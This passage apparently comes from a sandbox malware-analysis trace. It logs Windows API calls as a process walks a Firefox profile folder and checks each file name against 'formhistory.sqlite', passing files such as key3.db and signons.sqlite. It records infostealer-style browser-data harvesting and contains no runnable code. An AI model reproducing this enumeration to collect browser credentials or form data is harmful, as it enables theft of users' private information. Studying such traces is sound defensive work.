returned 0x0 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0591.112] lstrlenW (lpString="\\*.*") returned 4 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0591.112] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x2ee2ba0 [0591.112] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x52d448 | out: lpFindFileData=0x52d448) returned 0x5b9bd0 [0591.112] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.112] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d448 | out: lpFindFileData=0x52d448) returned 1 [0591.112] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.112] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.113] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d448 | out: lpFindFileData=0x52d448) returned 1 [0591.113] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0591.113] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0591.113] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0591.113] lstrlenW (lpString="\\") returned 1 [0591.113] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0591.113] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x2ee3d18 [0591.113] lstrlenW (lpString="818200132aebmoouht") returned 18 [0591.113] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0591.113] LocalAlloc (uFlags=0x40, uBytes=0x182) returned 0x2ee3e80 [0591.113] LocalFree (hMem=0x2ee3d18) returned 0x0 [0591.113] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0591.113] lstrlenW (lpString="\\*.*") returned 4 [0591.113] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0591.113] LocalAlloc (uFlags=0x40, uBytes=0x18a) returned 0x2ee4010 [0591.113] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x52d1cc | out: lpFindFileData=0x52d1cc) returned 0x5b9b90 [0591.113] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.113] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d1cc | out: lpFindFileData=0x52d1cc) returned 1 [0591.113] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.113] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.113] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d1cc | out: lpFindFileData=0x52d1cc) returned 0 [0591.113] FindClose (in: hFindFile=0x5b9b90 | out: hFindFile=0x5b9b90) returned 1 [0591.113] LocalFree (hMem=0x2ee4010) returned 0x0 [0591.113] LocalFree (hMem=0x2ee3e80) returned 0x0 [0591.113] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d448 | out: lpFindFileData=0x52d448) returned 1 [0591.113] lstrlenW (lpString="\\") returned 1 [0591.113] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0591.113] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x2ee3d18 [0591.113] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0591.113] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0591.113] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x2ee3e80 [0591.113] LocalFree (hMem=0x2ee3d18) returned 0x0 [0591.113] StrStrIW (lpFirst="818200132aebmoouht.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.113] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d448 | out: lpFindFileData=0x52d448) returned 0 [0591.113] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.113] LocalFree (hMem=0x2ee2ba0) returned 0x0 [0591.113] LocalFree (hMem=0x2ee2a38) returned 0x0 [0591.113] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 0 [0591.113] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.113] LocalFree (hMem=0x2ededf0) returned 0x0 [0591.113] LocalFree (hMem=0x2edec90) returned 0x0 [0591.113] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0 [0591.113] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.113] LocalFree (hMem=0x2edf8c0) returned 0x0 [0591.114] LocalFree (hMem=0x2edbc08) returned 0x0 [0591.114] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.114] lstrlenW (lpString="\\") returned 1 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.114] lstrlenW (lpString="key3.db") returned 7 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x2edbc08 [0591.114] LocalFree (hMem=0x63eca8) returned 0x0 [0591.114] StrStrIW (lpFirst="key3.db", lpSrch="formhistory.sqlite") returned 0x0 [0591.114] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.114] lstrlenW (lpString="\\") returned 1 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.114] lstrlenW (lpString="localstore.rdf") returned 14 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2edf8c0 [0591.114] LocalFree (hMem=0x63eca8) returned 0x0 [0591.114] StrStrIW (lpFirst="localstore.rdf", lpSrch="formhistory.sqlite") returned 0x0 [0591.114] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.114] lstrlenW (lpString="\\") returned 1 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.114] lstrlenW (lpString="marionette.log") returned 14 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2edfa08 [0591.114] LocalFree (hMem=0x63eca8) returned 0x0 [0591.114] StrStrIW (lpFirst="marionette.log", lpSrch="formhistory.sqlite") returned 0x0 [0591.114] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.114] lstrlenW (lpString="\\") returned 1 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.114] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2edfb50 [0591.114] LocalFree (hMem=0x63eca8) returned 0x0 [0591.114] StrStrIW (lpFirst="mimeTypes.rdf", lpSrch="formhistory.sqlite") returned 0x0 [0591.114] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.114] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0591.114] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.114] lstrlenW (lpString="\\") returned 1 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.114] lstrlenW (lpString="minidumps") returned 9 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edbad0 [0591.114] LocalFree (hMem=0x63eca8) returned 0x0 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0591.114] lstrlenW (lpString="\\*.*") returned 4 [0591.114] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0591.114] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2edfc98 [0591.114] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*.*", lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0x5b9b50 [0591.114] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.114] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.114] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.114] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.115] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0 [0591.115] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.115] LocalFree (hMem=0x2edfc98) returned 0x0 [0591.115] LocalFree (hMem=0x2edbad0) returned 0x0 [0591.115] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.115] lstrlenW (lpString="\\") returned 1 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.115] lstrlenW (lpString="parent.lock") returned 11 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x2edbad0 [0591.115] LocalFree (hMem=0x63eca8) returned 0x0 [0591.115] StrStrIW (lpFirst="parent.lock", lpSrch="formhistory.sqlite") returned 0x0 [0591.115] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.115] lstrlenW (lpString="\\") returned 1 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.115] lstrlenW (lpString="permissions.sqlite") returned 18 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x2edfc98 [0591.115] LocalFree (hMem=0x63eca8) returned 0x0 [0591.115] StrStrIW (lpFirst="permissions.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.115] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.115] lstrlenW (lpString="\\") returned 1 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.115] lstrlenW (lpString="places.sqlite") returned 13 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2edfde0 [0591.115] LocalFree (hMem=0x63eca8) returned 0x0 [0591.115] StrStrIW (lpFirst="places.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.115] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.115] lstrlenW (lpString="\\") returned 1 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.115] lstrlenW (lpString="pluginreg.dat") returned 13 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2edff28 [0591.115] LocalFree (hMem=0x63eca8) returned 0x0 [0591.115] StrStrIW (lpFirst="pluginreg.dat", lpSrch="formhistory.sqlite") returned 0x0 [0591.115] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.115] lstrlenW (lpString="\\") returned 1 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.115] lstrlenW (lpString="prefs.js") returned 8 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edbd40 [0591.115] LocalFree (hMem=0x63eca8) returned 0x0 [0591.115] StrStrIW (lpFirst="prefs.js", lpSrch="formhistory.sqlite") returned 0x0 [0591.115] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.115] lstrlenW (lpString="\\") returned 1 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.115] lstrlenW (lpString="search.json") returned 11 [0591.115] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.115] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x2edbe78 [0591.115] LocalFree (hMem=0x63eca8) returned 0x0 [0591.116] StrStrIW (lpFirst="search.json", lpSrch="formhistory.sqlite") returned 0x0 [0591.116] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.116] lstrlenW (lpString="\\") returned 1 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.116] lstrlenW (lpString="secmod.db") returned 9 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edbfb0 [0591.116] LocalFree (hMem=0x63eca8) returned 0x0 [0591.116] StrStrIW (lpFirst="secmod.db", lpSrch="formhistory.sqlite") returned 0x0 [0591.116] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.116] lstrlenW (lpString="\\") returned 1 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.116] lstrlenW (lpString="sessionstore.bak") returned 16 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ee0070 [0591.116] LocalFree (hMem=0x63eca8) returned 0x0 [0591.116] StrStrIW (lpFirst="sessionstore.bak", lpSrch="formhistory.sqlite") returned 0x0 [0591.116] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.116] lstrlenW (lpString="\\") returned 1 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.116] lstrlenW (lpString="sessionstore.js") returned 15 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x2ee01b8 [0591.116] LocalFree (hMem=0x63eca8) returned 0x0 [0591.116] StrStrIW (lpFirst="sessionstore.js", lpSrch="formhistory.sqlite") returned 0x0 [0591.116] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.116] lstrlenW (lpString="\\") returned 1 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.116] lstrlenW (lpString="signons.sqlite") returned 14 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ee0300 [0591.116] LocalFree (hMem=0x63eca8) returned 0x0 [0591.116] StrStrIW (lpFirst="signons.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.116] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.116] lstrlenW (lpString="\\") returned 1 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.116] lstrlenW (lpString="times.json") returned 10 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x2edc0e8 [0591.116] LocalFree (hMem=0x63eca8) returned 0x0 [0591.116] StrStrIW (lpFirst="times.json", lpSrch="formhistory.sqlite") returned 0x0 [0591.116] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.116] lstrlenW (lpString="\\") returned 1 [0591.116] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.116] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.116] lstrlenW (lpString="urlclassifierkey3.txt") returned 21 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.117] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x2edec90 [0591.117] LocalFree (hMem=0x63eca8) returned 0x0 [0591.117] StrStrIW (lpFirst="urlclassifierkey3.txt", lpSrch="formhistory.sqlite") returned 0x0 [0591.117] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.117] lstrcmpiW (lpString1="weave", lpString2=".") returned 1 [0591.117] lstrcmpiW (lpString1="weave", lpString2="..") returned 1 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.117] lstrlenW (lpString="\\") returned 1 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.117] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.117] lstrlenW (lpString="weave") returned 5 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.117] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc220 [0591.117] LocalFree (hMem=0x63eca8) returned 0x0 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0591.117] lstrlenW (lpString="\\*.*") returned 4 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0591.117] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc358 [0591.117] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*.*", lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0x5b9b50 [0591.117] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.117] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.117] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.117] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.117] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.117] lstrcmpiW (lpString1="changes", lpString2=".") returned 1 [0591.117] lstrcmpiW (lpString1="changes", lpString2="..") returned 1 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0591.117] lstrlenW (lpString="\\") returned 1 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0591.117] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc490 [0591.117] lstrlenW (lpString="changes") returned 7 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0591.117] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2ee0448 [0591.117] LocalFree (hMem=0x2edc490) returned 0x0 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0591.117] lstrlenW (lpString="\\*.*") returned 4 [0591.117] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0591.117] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee0590 [0591.117] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*.*", lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 0x5b9b10 [0591.117] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.117] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 1 [0591.117] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.117] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.117] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 0 [0591.117] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.118] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.118] LocalFree (hMem=0x2ee0448) returned 0x0 [0591.118] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.118] lstrcmpiW (lpString1="failed", lpString2=".") returned 1 [0591.118] lstrcmpiW (lpString1="failed", lpString2="..") returned 1 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0591.118] lstrlenW (lpString="\\") returned 1 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0591.118] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc490 [0591.118] lstrlenW (lpString="failed") returned 6 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0591.118] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0448 [0591.118] LocalFree (hMem=0x2edc490) returned 0x0 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0591.118] lstrlenW (lpString="\\*.*") returned 4 [0591.118] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0591.118] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ee0590 [0591.118] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*.*", lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 0x5b9b10 [0591.118] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.118] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 1 [0591.118] lstrcmpiW (lpString1="..", lpString2=".") returned 